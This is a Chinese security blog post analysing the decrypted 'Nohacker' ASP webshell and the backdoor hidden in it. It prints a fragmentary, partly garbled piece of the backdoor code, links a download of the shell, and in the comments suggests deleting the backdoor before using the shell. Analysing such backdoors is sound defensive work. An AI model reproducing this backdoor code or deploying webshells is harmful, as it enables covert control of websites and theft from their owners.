• 欢迎访问金刀客博客!
  • 2019,春节快乐!

解密的Nohacker webshell及后门全分析

原创天空 admin 4203次浏览 已收录 4个评论

shell界面

在shell的明文里看到这么一句话—破解是能力,共享是精神(内部使用) …NoHacker,所以我就叫他nohacker shell了。解密思路一样,先是VBScript.Encode解密,然后自定义函数解密。
完全解密后,shell后门代码就出来了,

if Instr(Serveru,”127.0.0.1″)<>0 or Instr(Serveru,”192.168.”)<>0 or Instr(Serveru,”http://“)<>0 then
else
if session(“servec”)=1 then
session(“servec”)=session(“servec”)+1
code=”


 “” & Err.Description & “”

“”:Err.Clear:Response.Flush:End If:end sub:Sub RRS(str):response.write(str):End Sub:Function RePath(S):RePath=Replace(S,””\””,””\\””):End Function:Function RRePath(S):RRePath=Replace(S,””\\””,””\””):End Function:URL=Request.ServerVariables(“”URL””):ServerIP=Request.ServerVariables(“”LOCAL_ADDR””):Action=Request(“”Action””):Pos=2:RootPath=Server.MapPath(“”.””):WWWRoot=Server.MapPath(“”/””):Serveru=request.servervariables(“”http_host””)&url:FolderPath=Request(“”FolderPath””):Pn=pos*44:FName=Request(“”FName””):BackUrl=””

返回
“””
RRS”
RRS”“&ServerIP&”
RRS”


RRS”
rrs “
………………………………………………………………………………..

加密下载:
点击下载此文件
最开始出于共享的目的,发布了解密的源码,但是很多朋友劝说我,那么解密文件就不发布了。


金刀客博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明解密的Nohacker webshell及后门全分析
喜欢 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到
(4)个小伙伴在吐槽
  1. 大哥,你把WEBSHELL Decoder & Encoder这个软件也分享了吧。
    guoyunhai86862012-08-12 15:56 回复
  2. 解密函数怎么写。 duking395#163.com # 换@ 希望回复。
    admin 于 2010-07-20 03:09 PM 回复
    shell 中有,自己看看
    shinck2010-07-19 14:33 回复
  3. 请问 这个你是怎么破解出来的?赐教
    admin 于 2009-09-28 11:26 AM 回复
    这个问题太大了,你看看其它几篇文章,应当有所提及你的问题
    luckey2009-09-27 22:43 回复
  4. 老大,冒昧的问一下,你给出下载的文件里后门给去掉了没啊? 谢谢~~
    admin 于 2009-09-16 06:24 PM 回复
    帅哥,我只是解密,没有去处后门的。要用的话对照文章删除后门就行了。这个shell的作用就在加密,解密后其实也是很普通的东东了。
    bluedot2009-09-16 15:34 回复